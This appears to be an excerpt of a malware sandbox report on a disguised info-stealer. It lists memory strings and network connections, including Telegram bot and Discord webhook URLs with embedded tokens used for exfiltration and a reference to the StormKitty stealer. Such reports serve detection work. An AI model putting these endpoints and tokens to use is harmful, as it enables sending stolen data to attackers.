Source: WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendM
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000324E000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003076000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000354F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000352D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000030C6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003484000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003018000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003535000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage
Source: WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000328A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003098000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003064000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003034000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000003279000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002E69000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessageT
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bott-
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000003542000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003314000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000327B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000332D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.000000000326D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000003345000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003299000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000034A3000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000323F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000327D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000325D000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000350A000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003517000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000346F000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003451000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000003496000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000321B000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.000000000320E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgn
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/
Source: WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org/t
Source: WinDefend.exe, 00000004.00000002.3288846438.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3288493213.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 0000001F.00000002.3288810827.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api64.ipify.org3
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: ce3ed400-d1e84918ad678b08d2a369a3-Latest.log.21.dr	String found in binary or memory: https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000014.00000002.2527964251.00000000029B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC1787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019134E1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A0BAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8F738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Loaader.exe, 00000015.00000002.3282228143.000000000333D000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003335000.00000004.00000800.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 61272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61105
Source: unknown	Network traffic detected: HTTP traffic on port 61044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61106
Source: unknown	Network traffic detected: HTTP traffic on port 61067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61109
Source: unknown	Network traffic detected: HTTP traffic on port 61233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61221
Source: unknown	Network traffic detected: HTTP traffic on port 61313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61101
Source: unknown	Network traffic detected: HTTP traffic on port 61124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61222
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61103
Source: unknown	Network traffic detected: HTTP traffic on port 61147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61225
Source: unknown	Network traffic detected: HTTP traffic on port 61055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61117
Source: unknown	Network traffic detected: HTTP traffic on port 61209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61119
Source: unknown	Network traffic detected: HTTP traffic on port 61182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 61106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61234
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 61079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61250
Source: unknown	Network traffic detected: HTTP traffic on port 61159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61006
Source: unknown	Network traffic detected: HTTP traffic on port 61020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61129
Source: unknown	Network traffic detected: HTTP traffic on port 61091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61125
Source: unknown	Network traffic detected: HTTP traffic on port 61181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
